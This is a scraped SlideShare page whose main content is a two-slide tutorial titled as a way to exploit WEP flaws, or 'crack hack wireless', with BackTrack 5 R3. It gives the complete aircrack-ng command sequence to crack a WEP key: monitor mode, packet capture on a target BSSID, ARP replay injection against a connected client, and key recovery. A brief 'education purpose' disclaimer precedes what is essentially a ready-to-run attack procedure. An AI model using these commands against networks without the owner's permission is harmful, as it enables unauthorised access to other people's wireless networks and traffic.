Your SlideShare is downloading. ×
Exploit WEP Flaws in six steps using BackTrack 5 R3
Disclaimer
I provide this document for education purpose without any
r...
wepcarack222demo output file name
channel obtained from 2
5- From step 4 select connected host or wait for any if none
air...
Upcoming SlideShare
Loading in...5
×

Exploit wep flaws in six steps using backtrack 5 r3 (crack hack wireless)

8,921

Published on

Exploit WEP flaws in six steps using back track 5 r3 (crack hack wireless)

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
8,921
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
36
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Exploit wep flaws in six steps using backtrack 5 r3 (crack hack wireless)"

  1. 1. Exploit WEP Flaws in six steps using BackTrack 5 R3 Disclaimer I provide this document for education purpose without any responsibility of any illegal use Prerequisites 1. Backtrack 5 r3 2. Wireless interface compatible with backtrack a. Check this list http://www.aircrackng.org/doku.php? id=compatibility_drivers Scope of this document is WEP 1-Start wireless interface in monitoring mode airmon-ng start wlan0 2-list all wireless APs, hosts attached to them, their operating channels and encryption methods airodump-ng mon0 3-you must set the monitor interface mon0 on the same channel as access point iwconfig mon0 channel 11 4-airodump-ng --bssid 00:16:01:AE:21:64 --channel 11 --write wepcarack222demo mon0 00:16:01:AE:21:69 is AP address obtained from step 2
  2. 2. wepcarack222demo output file name channel obtained from 2 5- From step 4 select connected host or wait for any if none aireplay-ng -3 -b 00:16:01:AE:21:64 -h F0:D1:A9:F0:34:6C mon0 6-aircrack-ng wepcarack222demo-03.cap Steps 4-5-6 must be on different terminal simultaneously Any questions drop an email to mohammedomar@yahoo.com

×